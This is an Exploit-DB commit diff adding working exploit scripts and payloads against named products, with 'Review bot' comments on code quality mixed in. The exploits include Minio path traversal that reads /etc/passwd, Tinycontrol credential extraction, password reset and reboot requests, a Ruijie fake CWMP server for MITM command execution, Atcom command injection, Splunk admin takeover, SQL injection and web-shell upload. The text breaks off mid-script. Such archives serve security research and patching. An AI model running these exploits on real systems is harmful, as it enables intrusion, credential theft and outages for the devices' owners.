DB: 2023-10-10

24 changes to exploits/shellcodes/ghdb

Minio 2022-07-29T19-40-48Z - Path traversal

Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Denial Of Service

Atcom 2.7.x.x - Authenticated Command Injection

Ruijie Reyee Mesh Router - MITM Remote Code Execution (RCE)
Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Admin Password Change
Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Credentials Extraction

OpenPLC WebServer 3 - Denial of Service

Splunk 9.0.5 - admin account take over

BoidCMS v2.0.0 - authenticated file upload vulnerability

Cacti 1.2.24 - Authenticated command injection when using SNMP options

Chitor-CMS v1.1.2 - Pre-Auth SQL Injection

Clcknshop 1.0.0 - SQL Injection

Coppermine Gallery 1.6.25 - RCE

Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated)

GLPI GZIP(Py3) 9.4.5 - RCE

Limo Booking Software v1.0 - CORS

Media Library Assistant Wordpress Plugin - RCE and LFI

Online ID Generator 1.0 - Remote Code Execution (RCE)

Shuttle-Booking-Software v1.0 - Multiple-SQLi

Webedition CMS v2.9.8.8 - Blind SSRF

WEBIGniter v28.7.23 File Upload - Remote Code Execution

Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation

Wordpress Sonaar Music Plugin 4.7 - Stored XSS

Microsoft Windows 11 - 'apds.dll' DLL hijacking (Forced)
This commit is contained in:
Exploit-DB 2023-10-10 00:16:32 +00:00
parent e5f7757184
commit f3649a641f
24 changed files with 2075 additions and 5 deletions

exploits/go/webapps/51734.py Executable file

@ -0,0 +1,81 @@
# Exploit Title: Minio 2022-07-29T19-40-48Z - Path traversal
# Date: 2023-09-02
# Exploit Author: Jenson Zhao
# Vendor Homepage: https://min.io/
# Software Link: https://github.com/minio/minio/
# Version: Up to (excluding) 2022-07-29T19-40-48Z
# Tested on: Windows 10
# CVE : CVE-2022-35919
# Required before execution: pip install minio,requests
import urllib.parse
import requests, json, re, datetime, argparse
from minio.credentials import Credentials
from minio.signer import sign_v4_s3
class MyMinio():
secure = False
def __init__(self, base_url, access_key, secret_key):
self.credits = Credentials(
access_key=access_key,
secret_key=secret_key
)
if base_url.startswith('http://') and base_url.endswith('/'):
self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd'
elif base_url.startswith('https://') and base_url.endswith('/'):
self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd'
self.secure = True
else:
print('Please enter a URL address that starts with "http://" or "https://" and ends with "/"\n')
def poc(self):
datetimes = datetime.datetime.utcnow()
datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ')
urls = urllib.parse.urlparse(self.url)
headers = {
'X-Amz-Content-Sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',
'X-Amz-Date': datetime_str,
'Host': urls.netloc,
}
headers = sign_v4_s3(
method='POST',
url=urls,
region='',
headers=headers,
credentials=self.credits,
content_sha256='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',
date=datetimes,
)
if self.secure:
response = requests.post(url=self.url, headers=headers, verify=False)
else:
response = requests.post(url=self.url, headers=headers)
try:
message = json.loads(response.text)['Message']
pattern = r'(\w+):(\w+):(\d+):(\d+):(\w+):(\/[\w\/\.-]+):(\/[\w\/\.-]+)'
matches = re.findall(pattern, message)
if matches:
print('There is CVE-2022-35919 problem with the url!')
print('The contents of the /etc/passwd file are as follows:')
for match in matches:
print("{}:{}:{}:{}:{}:{}:{}".format(match[0], match[1], match[2], match[3], match[4], match[5],
match[6]))
else:
print('There is no CVE-2022-35919 problem with the url!')
print('Here is the response message content:')
print(message)
except Exception as e:
print(
'It seems there was an issue with the requested response, which did not meet our expected criteria. Here is the response content:')
print(response.text)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", required=True, help="URL of the target. example: http://192.168.1.1:9088/")
parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin")
parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin")
args = parser.parse_args()
minio = MyMinio(args.url, args.accesskey, args.secretkey)
minio.poc()
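Review bot: in `__init__`, when the URL fails both the `http://` and `https://` prefix/suffix checks the code prints a hint but carries on, so `self.url` is never assigned and `poc()` dies with an AttributeError at `urllib.parse.urlparse(self.url)`; exit or raise there instead. The header also omits a precondition the script itself enforces (`-a`/`-s` are `required=True`): state in the metadata that valid access and secret keys are needed to reach `minio/admin/v3/update`, since that distinction is what anyone triaging exposure needs. Minor: `verify=False` on the HTTPS branch silently disables certificate validation, `datetime.datetime.utcnow()` is deprecated since Python 3.12 (`datetime.datetime.now(datetime.timezone.utc)`), and the bare `except Exception as e` never uses `e`.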


@ -0,0 +1,47 @@
Exploit Title: Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Denial Of Service
Exploit Author: LiquidWorm
Vendor: Tinycontrol
Product web page: https://www.tinycontrol.pl
Affected version: <=1.58a, HW 3.8
Summary: Lan Controller is a very universal
device that allows you to connect many different
sensors and remotely view their readings and
remotely control various types of outputs.
It is also possible to combine both functions
into an automatic if -> this with a calendar
when -> then. The device provides a user interface
in the form of a web page. The website presents
readings of various types of sensors: temperature,
humidity, pressure, voltage, current. It also
allows you to configure the device, incl. event
setting and controlling up to 10 outputs. Thanks
to the support of many protocols, it is possible
to operate from smartphones, collect and observ
the results on the server, as well as cooperation
with other I/O systems based on TCP/IP and Modbus.
Desc: The controller suffers from an unauthenticated
remote denial of service vulnerability. An attacker
can issue direct requests to the stm.cgi page to
reboot and also reset factory settings on the device.
Tested on: lwIP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5785
Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5785.php
18.08.2023
--
$ curl http://192.168.1.1:8082/stm.cgi?eeprom_reset=1 # restore default settings
$ curl http://192.168.1.1:8082/stm.cgi?lk3restart=1 # reboot controller
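Review bot: both `curl` lines leave the query string unquoted, so the `?` is subject to shell pathname expansion; quote the URLs. `Tested on: lwIP` names the device's TCP/IP stack, not the firmware build the finding was confirmed on; the affected-version line already says `<=1.58a, HW 3.8`, so give the tested firmware there too. Typo in the summary: `observ` should be `observe`.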


@ -0,0 +1,176 @@
# Exploit Title: Ruijie Reyee Wireless Router firmware version B11P204 - MITM Remote Code Execution (RCE)
# Date: April 15, 2023
# Exploit Author: Mochammad Riyan Firmansyah of SecLab Indonesia
# Vendor Homepage: https://ruijienetworks.com
# Software Link: https://www.ruijienetworks.com/support/documents/slide_EW1200G-PRO-Firmware-B11P204
# Version: ReyeeOS 1.204.1614; EW_3.0(1)B11P204, Release(10161400)
# Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO
"""
Summary
=======
The Ruijie Reyee Cloud Web Controller allows the user to use a diagnostic tool which includes a ping check to ensure connection to the intended network, but the ip address input form is not validated properly and allows the user to perform OS command injection.
In other side, Ruijie Reyee Cloud based Device will make polling request to Ruijie Reyee CWMP server to ask if there's any command from web controller need to be executed. After analyze the network capture that come from the device, the connection for pooling request to Ruijie Reyee CWMP server is unencrypted HTTP request.
Because of unencrypted HTTP request that come from Ruijie Reyee Cloud based Device, attacker could make fake server using Man-in-The-Middle (MiTM) attack and send arbitrary commands to execute on the cloud based device that make CWMP request to fake server.
Once the attacker have gained access, they can execute arbitrary commands on the system or application, potentially compromising sensitive data, installing malware, or taking control of the system.
This advisory has also been published at https://github.com/ruzfi/advisory/tree/main/ruijie-wireless-router-mitm-rce.
"""
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from html import escape, unescape
import http.server
import socketserver
import io
import time
import re
import argparse
import gzip
# command payload
command = "uname -a"
# change this to serve on a different port
PORT = 8080
def cwmp_inform(soap):
cwmp_id = re.search(r"(?:<cwmp:ID.*?>)(.*?)(?:<\/cwmp:ID>)", soap).group(1)
product_class = re.search(r"(?:<ProductClass.*?>)(.*?)(?:<\/ProductClass>)", soap).group(1)
serial_number = re.search(r"(?:<SerialNumber.*?>)(.*?)(?:<\/SerialNumber>)", soap).group(1)
result = {'cwmp_id': cwmp_id, 'product_class': product_class, 'serial_number': serial_number, 'parameters': {}}
parameters = re.findall(r"(?:<P>)(.*?)(?:<\/P>)", soap)
for parameter in parameters:
parameter_name = re.search(r"(?:<N>)(.*?)(?:<\/N>)", parameter).group(1)
parameter_value = re.search(r"(?:<V>)(.*?)(?:<\/V>)", parameter).group(1)
result['parameters'][parameter_name] = parameter_value
return result
def cwmp_inform_response():
return """<?xml version='1.0' encoding='UTF-8'?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:cwmp="urn:dslforum-org:cwmp-1-0" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Header><cwmp:ID SOAP-ENV:mustUnderstand="1">16</cwmp:ID><cwmp:NoMoreRequests>1</cwmp:NoMoreRequests></SOAP-ENV:Header><SOAP-ENV:Body><cwmp:InformResponse><MaxEnvelopes>1</MaxEnvelopes></cwmp:InformResponse></SOAP-ENV:Body></SOAP-ENV:Envelope>"""
def command_payload(command):
current_time = time.time()
result = """<?xml version='1.0' encoding='UTF-8'?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:cwmp="urn:dslforum-org:cwmp-1-0" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Header><cwmp:ID SOAP-ENV:mustUnderstand="1">ID:intrnl.unset.id.X_RUIJIE_COM_CN_ExecuteCliCommand{cur_time}</cwmp:ID><cwmp:NoMoreRequests>1</cwmp:NoMoreRequests></SOAP-ENV:Header><SOAP-ENV:Body><cwmp:X_RUIJIE_COM_CN_ExecuteCliCommand><Mode>config</Mode><CommandList SOAP-ENC:arrayType="xsd:string[1]"><Command>{command}</Command></CommandList></cwmp:X_RUIJIE_COM_CN_ExecuteCliCommand></SOAP-ENV:Body></SOAP-ENV:Envelope>""".format(cur_time=current_time, command=command)
return result
def command_response(soap):
cwmp_id = re.search(r"(?:<cwmp:ID.*?>)(.*?)(?:<\/cwmp:ID>)", soap).group(1)
command = re.search(r"(?:<Command>)(.*?)(?:<\/Command>)", soap).group(1)
response = re.search(r"(?:<Response>)((\n|.)*?)(?:<\/Response>)", soap).group(1)
result = {'cwmp_id': cwmp_id, 'command': command, 'response': response}
return result
class CustomHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
protocol_version = 'HTTP/1.1'
def do_GET(self):
self.send_response(204)
self.end_headers()
def do_POST(self):
print("[*] Got hit by", self.client_address)
f = io.BytesIO()
if 'service' in self.path:
stage, info = self.parse_stage()
if stage == "cwmp_inform":
self.send_response(200)
print("[!] Got Device information", self.client_address)
print("[*] Product Class:", info['product_class'])
print("[*] Serial Number:", info['serial_number'])
print("[*] MAC Address:", info['parameters']['mac'])
print("[*] STUN Client IP:", info['parameters']['stunclientip'])
payload = bytes(cwmp_inform_response(), 'utf-8')
f.write(payload)
self.send_header("Content-Length", str(f.tell()))
elif stage == "command_request":
self.send_response(200)
self.send_header("Set-Cookie", "JSESSIONID=6563DF85A6C6828915385C5CDCF4B5F5; Path=/service; HttpOnly")
print("[*] Device interacting", self.client_address)
print(info)
payload = bytes(command_payload(escape("ping -c 4 127.0.0.1 && {}".format(command))), 'utf-8')
f.write(payload)
self.send_header("Content-Length", str(f.tell()))
else:
print("[*] Command response", self.client_address)
print(unescape(info['response']))
self.send_response(204)
f.write(b"")
else:
print("[x] Received invalid request", self.client_address)
self.send_response(204)
f.write(b"")
f.seek(0)
self.send_header("Connection", "keep-alive")
self.send_header("Content-type", "text/xml;charset=utf-8")
self.end_headers()
if f:
self.copyfile(f, self.wfile)
f.close()
def parse_stage(self):
content_length = int(self.headers['Content-Length'])
post_data = gzip.decompress(self.rfile.read(content_length))
if "cwmp:Inform" in post_data.decode("utf-8"):
return ("cwmp_inform", cwmp_inform(post_data.decode("utf-8")))
elif "cwmp:X_RUIJIE_COM_CN_ExecuteCliCommandResponse" in post_data.decode("utf-8"):
return ("command_response", command_response(post_data.decode("utf-8")))
else:
return ("command_request", "Ping!")
def log_message(self, format, *args):
return
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--bind', '-b', default='', metavar='ADDRESS',
help='Specify alternate bind address '
'[default: all interfaces]')
parser.add_argument('port', action='store',
default=PORT, type=int,
nargs='?',
help='Specify alternate port [default: {}]'.format(PORT))
args = parser.parse_args()
Handler = CustomHTTPRequestHandler
with socketserver.TCPServer((args.bind, args.port), Handler) as httpd:
ip_addr = args.bind if args.bind != '' else '0.0.0.0'
print("[!] serving fake CWMP server at {}:{}".format(ip_addr, args.port))
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
"""
Output
======
ubuntu:~$ python3 exploit.py
[!] serving fake CWMP server at 0.0.0.0:8080
[*] Got hit by ('[redacted]', [redacted])
[!] Got Device information ('[redacted]', [redacted])
[*] Product Class: EW1200G-PRO
[*] Serial Number: [redacted]
[*] MAC Address: [redacted]
[*] STUN Client IP: [redacted]:[redacted]
[*] Got hit by ('[redacted]', [redacted])
[*] Device interacting ('[redacted]', [redacted])
Ping!
[*] Got hit by ('[redacted]', [redacted])
[*] Command response ('[redacted]', [redacted])
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: seq=0 ttl=64 time=0.400 ms
64 bytes from 127.0.0.1: seq=1 ttl=64 time=0.320 ms
64 bytes from 127.0.0.1: seq=2 ttl=64 time=0.320 ms
64 bytes from 127.0.0.1: seq=3 ttl=64 time=0.300 ms
--- 127.0.0.1 ping statistics ---
4 packets transmitted, 4 packets received, 0% packet loss
round-trip min/avg/max = 0.300/0.335/0.400 ms
Linux Ruijie 3.10.108 #1 SMP Fri Apr 14 00:39:29 UTC 2023 mips GNU/Linux
"""

exploits/hardware/remote/51731.py Executable file

@ -0,0 +1,117 @@
#!/usr/bin/env python
#
#Exploit Title: Tinycontrol LAN Controller v3 (LK3) - Remote Credentials Extraction
# Exploit Author: LiquidWorm
#
# Vendor: Tinycontrol
# Product web page: https://www.tinycontrol.pl
# Affected version: <=1.58a, HW 3.8
#
# Summary: Lan Controller is a very universal
# device that allows you to connect many different
# sensors and remotely view their readings and
# remotely control various types of outputs.
# It is also possible to combine both functions
# into an automatic if -> this with a calendar
# when -> then. The device provides a user interface
# in the form of a web page. The website presents
# readings of various types of sensors: temperature,
# humidity, pressure, voltage, current. It also
# allows you to configure the device, incl. event
# setting and controlling up to 10 outputs. Thanks
# to the support of many protocols, it is possible
# to operate from smartphones, collect and observ
# the results on the server, as well as cooperation
# with other I/O systems based on TCP/IP and Modbus.
#
# Desc: An unauthenticated attacker can retrieve the
# controller's configuration backup file and extract
# sensitive information that can allow him/her/them
# to bypass security controls and penetrate the system
# in its entirety.
#
# Tested on: lwIP
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2023-5786
# Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5786.php
#
#
# 18.08.2023
#
#
import subprocess
import requests
import base64
import sys
binb = "lk3_settings.bin"
outf = "lk3_settings.enc"
bpatt = "0upassword"
epatt = "pool.ntp.org"
startf = False
endf = False
extral = []
print("""
O`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'O
| |
| Tinycontrol LK3 1.58 Settings DL |
| ZSL-2023-5786 |
| 2023 (c) Zero Science Lab |
| |
|`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'|
| |
""")
if len(sys.argv) != 2:
print("[?] Vaka: python {} ipaddr:port".format(sys.argv[0]))
exit(-0)
else:
rhost=sys.argv[1]
if not "http" in rhost:
rhost="http://{}".format(rhost)
try:
resp = requests.get(rhost + "/" + binb)
if resp.status_code == 200:
with open(outf, 'wb') as f:
f.write(resp.content)
print(f"[*] Got data as {outf}")
else:
print(f"[!] Backup failed. Status code: {resp.status_code}")
except Exception as e:
print("[!] Error:", str(e))
exit(-1)
binf = outf
sout = subprocess.check_output(["strings", binf], universal_newlines = True)
linea = sout.split("\n")
for thricer in linea:
if bpatt in thricer:
startf = True
elif epatt in thricer:
endf = True
elif startf and not endf:
extral.append(thricer)
if len(extral) >= 4:
userl = extral[1].strip()
adminl = extral[3].strip()
try:
decuser = base64.b64decode(userl).decode("utf-8")
decadmin = base64.b64decode(adminl).decode("utf-8")
print("[+] User password:", decuser)
print("[+] Admin password:", decadmin)
except Exception as e:
print("[!] Error decoding:", str(e))
else:
print("[!] Regex failed.")
exit(-2)
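Review bot: the shebang is `#!/usr/bin/env python` but the script uses f-strings (`f"[*] Got data as {outf}"`), so on a host where `python` is 2.x it fails with a SyntaxError before doing anything; use `python3`. `exit(-0)` after the usage message exits with status 0, and the usage text reads `[?] Vaka:` where `Usage:` is meant. The `strings` call is an external binary dependency (absent on Windows, which the other advisories in this commit list as a test platform), and the fallback message `[!] Regex failed.` is misleading since no regex is involved: the condition that failed is fewer than four strings appearing between `0upassword` and `pool.ntp.org`. Also `not "http" in rhost` reads better as `"http" not in rhost`.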


@ -0,0 +1,62 @@
#!/bin/bash
: "
Exploit Title: Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Admin Password Change
Exploit Author: LiquidWorm
Vendor: Tinycontrol
Product web page: https://www.tinycontrol.pl
Affected version: <=1.58a, HW 3.8
Summary: Lan Controller is a very universal
device that allows you to connect many different
sensors and remotely view their readings and
remotely control various types of outputs.
It is also possible to combine both functions
into an automatic if -> this with a calendar
when -> then. The device provides a user interface
in the form of a web page. The website presents
readings of various types of sensors: temperature,
humidity, pressure, voltage, current. It also
allows you to configure the device, incl. event
setting and controlling up to 10 outputs. Thanks
to the support of many protocols, it is possible
to operate from smartphones, collect and observ
the results on the server, as well as cooperation
with other I/O systems based on TCP/IP and Modbus.
Desc: The application suffers from an insecure access
control allowing an unauthenticated attacker to
change accounts passwords and bypass authentication
gaining panel control access.
Tested on: lwIP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5787
Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5787.php
18.08.2023
"
set -euo pipefail
IFS=$'\n\t'
if [ $# -ne 2 ]; then
echo -ne '\nUsage: $0 [ipaddr] [desired admin pwd]\n\n'
exit
fi
IP=$1
PW=$2
EN=$(echo -n $PW | base64)
curl -s http://$IP/stm.cgi?auth=00YWRtaW4=*$EN*dXNlcg==*dXNlcg==
# ?auth=00 (disable authentication, disable upgrade), https://docs.tinycontrol.pl/en/lk3/api/access/
echo -ne '\nAdmin password changed to: '$PW
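Review bot: the success message is printed unconditionally: `curl -s` hides HTTP errors and exits 0 on a 4xx/5xx, so `set -e` never fires and the script reports `Admin password changed to:` even when nothing changed; add `-f` or inspect the response before echoing. `echo -ne '\nUsage: $0 [ipaddr] [desired admin pwd]\n\n'` is single-quoted, so `$0` is printed literally (use double quotes), and the usage path exits with status 0. `echo -n $PW | base64` leaves `$PW` unquoted (word splitting and globbing), and GNU `base64` wraps at 76 columns, so a long password produces a broken value; quote the variable and pass `-w0` on GNU coreutils. The `curl` URL contains `?`, `=` and `*` and should be quoted as well.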


@ -0,0 +1,36 @@
# Exploit Title: Atcom 2.7.x.x - Authenticated Command Injection
# Google Dork: N/A
# Date: 07/09/2023
# Exploit Author: Mohammed Adel
# Vendor Homepage: https://www.atcom.cn/
# Software Link:
https://www.atcom.cn/html/yingwenban/Product/Fast_IP_phone/2017/1023/135.html
# Version: All versions above 2.7.x.x
# Tested on: Kali Linux
Exploit Request:
POST /cgi-bin/web_cgi_main.cgi?user_get_phone_ping HTTP/1.1
Host: {TARGET_IP}
User-Agent: polar
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Authorization: Digest username="admin", realm="IP Phone Web
Configuration", nonce="value_here",
uri="/cgi-bin/web_cgi_main.cgi?user_get_phone_ping",
response="value_here", qop=auth, nc=value_here, cnonce="value_here"
cmd=0.0.0.0$(pwd)&ipv4_ipv6=0&user_get_phone_ping
Response:
{"ping_cmd_result":"cGluZzogYmFkIGFkZHJlc3MgJzAuMC4wLjAvdXNyL2xvY2FsL2FwcC9saWdodHRwZC93d3cvY2dpLWJpbicK","ping_cmd":"0.0.0.0$(pwd)"}
The value of "ping_cmd_result" is encoded as base64. Decoding the
value of "ping_cmd_result" reveals the result of the command executed
as shown below:
ping: bad address '0.0.0.0/usr/local/app/lighttpd/www/cgi-bin'
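Review bot: `# Version: All versions above 2.7.x.x` contradicts the title `Atcom 2.7.x.x - Authenticated Command Injection`; state the exact build tested and whether 2.7.x.x itself is affected. The `# Software Link:` URL has wrapped onto its own line without the `#` prefix, and the `Authorization: Digest ...` header is wrapped over four lines, both of which break a copy of the request; join them. The request also lacks the blank line between the last header and the `cmd=...` body.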

File diff suppressed because one or more lines are too long


@ -0,0 +1,96 @@
#!/usr/bin/env python3
#
# Exploit Title: Splunk 9.0.5 - admin account take over
# Author: [Redway Security](https://twitter.com/redwaysec))
# Discovery: [Santiago Lopez](https://twitter.com/santi_lopezz99)
#CVE: CVE-2023-32707
# Vendor Description: A low-privilege user who holds a role that has the `edit_user` capability assigned
# to it can escalate their privileges to that of the admin user by providing specially crafted web requests.
#
# Versions Affected: Splunk Enterprise **below** 9.0.5, 8.2.11, and 8.1.14.
#
import argparse
import requests
import random
import string
import base64
# ignore warnings
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Parse command-line arguments
parser = argparse.ArgumentParser(description='Splunk Authentication')
parser.add_argument('--host', required=True, help='Splunk host or IP address')
parser.add_argument('--username', required=True, help='Splunk username')
parser.add_argument('--password', required=True, help='Splunk password')
parser.add_argument('--target-user', required=True, help='Target user')
parser.add_argument('--force-exploit', action='store_true',
help='Force exploit')
args = parser.parse_args()
# Splunk server settings
splunk_host = args.host.split(':')[0]
splunk_username = args.username
splunk_password = args.password
target_user = args.target_user
force_exploit = args.force_exploit
splunk_port = args.host.split(':')[1] if len(args.host.split(':')) > 1 else 8089
user_endpoint = f"https://{splunk_host}:{splunk_port}/services/authentication/users"
credentials = f"{splunk_username}:{splunk_password}"
base64_credentials = base64.b64encode(credentials.encode()).decode()
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0',
'Authorization': f'Basic {base64_credentials}'
}
proxies = {
# 'http': '[http://127.0.0.1:8080'](<a href=),">http://127.0.0.1:8080',
# 'https': 'http://127.0.0.1:8080'
}
response = requests.get(f"{user_endpoint}/{splunk_username}?output_mode=json",
headers=headers, proxies=proxies, verify=False)
if response.status_code == 200:
affected_versions = ['9.0.4', '8.2.10', '8.1.13']
user = response.json()
splunk_version = user['generator']['version']
# This is not a good way to compare versions.
# There is a range of versions that are affected by this CVE, but this is just a PoC
# 8.1.0 to 8.1.13
# 8.2.0 to 8.2.10
# 9.0.0 to 9.0.4
print(f"Detected Splunk version '{splunk_version}'")
if any(splunk_version <= value for value in affected_versions) or force_exploit:
user_capabilities = user['entry'][0]['content']['capabilities']
if 'edit_user' in user_capabilities:
print(
f"User '{splunk_username}' has the 'edit_user' capability, which would make this target exploitable.")
new_password = ''.join(random.choice(
string.ascii_letters + string.digits) for _ in range(8))
change_password_payload = {
'password': new_password,
'force-change-pass': 0,
'locked-out': 0
}
response = requests.post(f"{user_endpoint}/{target_user}?output_mode=json",
data=change_password_payload, headers=headers, proxies=proxies, verify=False)
if response.status_code == 200:
print(
f"Successfully taken over user '{target_user}', log into Splunk with the password '{new_password}'")
else:
print('Account takeover failed')
else:
print(
f"User '{splunk_username}' does not have the 'edit_user' capability, which makes this target not exploitable by this user.")
else:
print(f"Splunk version '{splunk_version}' is not affected by CVE-2023-32707")
else:
print(
f"Couldn't authenticate to Splunk server '{splunk_host}' with user '{splunk_username}' and password '{splunk_password}'")
exit(1)
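Review bot: the version gate `any(splunk_version <= value for value in affected_versions)` compares strings lexically, so `'8.1.9' <= '8.1.13'` is False (an affected build is reported as not affected) while `'10.0.0' <= '9.0.4'` is True (false positive); parse the version into an integer tuple and compare per branch against the ranges the comment already lists (8.1.0 to 8.1.13, 8.2.0 to 8.2.10, 9.0.0 to 9.0.4). The script overwrites the target user's password with a random 8-character string and offers no way to restore the old one, so the header should state that the PoC is destructive and needs authorization and a recovery plan before it is run. Minor: the commented proxy line `'http': '[http://127.0.0.1:8080'](<a href=),">http://127.0.0.1:8080',` carries HTML debris, the `# Author:` line has a doubled `)`, and the authentication-failure message prints the supplied password to stdout.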


@ -15,5 +15,3 @@ Content-Type: application/x-www-form-urlencoded
Content-Length: 756
_token=[_TOKEN]&name=testing&role_id=1&email=testing%40testing.testing&password=testing&g-recaptcha-response=[G-RECAPTCHA-RESPONSE]&submit_register=Register
-- Sent with https://mailfence.com Secure and private email
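Review bot: `-- Sent with https://mailfence.com Secure and private email` is a mail-client signature, not part of the PoC request, and should not be in the file. The hunk header `-15,5 +15,3` says two lines were deleted, but no removed lines appear in this rendering, so what the change actually drops cannot be reviewed here.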

exploits/php/webapps/51726.py Executable file

File diff suppressed because one or more lines are too long


@ -0,0 +1,39 @@
## Title: Online ID Generator 1.0 - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 08/31/2023
## Vendor: https://www.youtube.com/watch?v=JdB9_po5DTc
## Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/id_generator_0.zip
## Reference: https://portswigger.net/web-security/sql-injection
## Reference: https://portswigger.net/web-security/file-upload
## Reference: https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload
STATUS: HIGH-CRITICAL Vulnerability
[+]Bypass login SQLi:
# In login form, for user:
```mysql
nu11secur1ty' or 1=1#
```
[+]Shell Upload exploit:
## For system logo:
```php
<?php
phpinfo();
?>
```
[+]RCE Exploit
## Execution from the remote browser:
```URLhttp://localhost/id_generator/uploads/1693471560_info.php
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Online-ID-Generator-1.0)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/08/online-id-generator-10-sqli-bypass.html)
## Time spend:
00:10:00
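Review bot: the fence at ```` ```URLhttp://localhost/id_generator/uploads/1693471560_info.php ```` fuses the info string with the URL, so the block will not render; put the URL on its own line inside the fence (and `URL` is not a language tag). The SQLi step names neither the login script nor the parameter the payload goes into, so a maintainer cannot locate the unparameterised query; likewise the upload step does not say which form field lacks type checking. `## Vendor:` points at a YouTube video rather than a vendor page, and `Time spend` should be `Time spent`.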


@ -0,0 +1,39 @@
# Exploit Title: Clcknshop 1.0.0 - SQL Injection
# Exploit Author: CraCkEr
# Date: 16/08/2023
# Vendor: Infosoftbd Solutions
# Vendor Homepage: https://infosoftbd.com/
# Software Link: https://infosoftbd.com/multitenancy-e-commerce-solution/
# Demo: https://kidszone.clckn.shop/
# Version: 1.0.0
# Tested on: Windows 10 Pro
# Impact: Database Access
# CVE: CVE-2023-4708
# CWE: CWE-89 - CWE-74 - CWE-707
## Greetings
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob
## Description
SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.
Path: /collection/all
GET parameter 'tag' is vulnerable to SQL Injection
https://website/collection/all?tag=[SQLi]
---
Parameter: tag (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: tag=tshirt'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z
---

exploits/php/webapps/51735.py Executable file

@ -0,0 +1,100 @@
# Exploit Title: Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation
# Google Dork: inurl:/user-public-account
# Date: 2023-09-04
# Exploit Author: Revan Arifio
# Vendor Homepage: https:/.org/plugins/masterstudy-lms-learning-management-system/
# Version: <= 3.0.17
# Tested on: Windows, Linux
# CVE : CVE-2023-4278
import requests
import os
import re
import time
banner = """
_______ ________ ___ ___ ___ ____ _ _ ___ ______ ___
/ ____\ \ / / ____| |__ \ / _ \__ \|___ \ | || |__ \____ / _ \
| | \ \ / /| |__ ______ ) | | | | ) | __) |_____| || |_ ) | / / (_) |
| | \ \/ / | __|______/ /| | | |/ / |__ <______|__ _/ / / / > _ <
| |____ \ / | |____ / /_| |_| / /_ ___) | | |/ /_ / / | (_) |
\_____| \/ |______| |____|\___/____|____/ |_|____/_/ \___/
======================================================================================================
|| Title : Masterstudy LMS <= 3.0.17 - Unauthenticated Instructor Account Creation ||
|| Author : https://github.com/revan-ar ||
|| Vendor Homepage : https:/wordpress.org/plugins/masterstudy-lms-learning-management-system/ ||
|| Support : https://www.buymeacoffee.com/revan.ar ||
======================================================================================================
"""
print(banner)
# get nonce
def get_nonce(target):
open_target = requests.get("{}/user-public-account".format(target))
search_nonce = re.search('"stm_lms_register":"(.*?)"', open_target.text)
if search_nonce[1] != None:
return search_nonce[1]
else:
print("Failed when getting Nonce :p")
# privielege escalation
def privesc(target, nonce, username, password, email):
req_data = {
